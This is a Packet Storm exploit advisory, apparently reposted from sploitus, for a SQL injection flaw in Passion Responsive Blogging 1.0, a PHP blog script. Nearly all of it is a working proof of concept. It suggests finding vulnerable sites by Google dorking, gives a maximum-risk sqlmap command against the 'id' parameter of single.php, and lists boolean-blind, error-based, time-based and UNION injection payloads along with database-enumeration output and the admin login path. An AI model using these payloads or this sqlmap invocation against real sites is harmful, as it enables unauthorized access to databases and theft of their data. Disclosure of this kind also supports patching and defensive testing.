Share
## https://sploitus.com/exploit?id=PACKETSTORM:181409
=============================================================================================================================================
| # Title : Passion Responsive Blogging 1.0 SQL injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://code-projects.org/responsive-blog-site-in-php-with-source-code/ |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] use payload : /bmacblog/single.php?id=1 <==== inject here
[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9732=9732-- jEuI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -
---
[23:52:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:52:32] [INFO] fetching database names
available databases [2]:
[*] bmac_blog_admin_db
[*] information_schema
[+] Login : /blogadmin
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================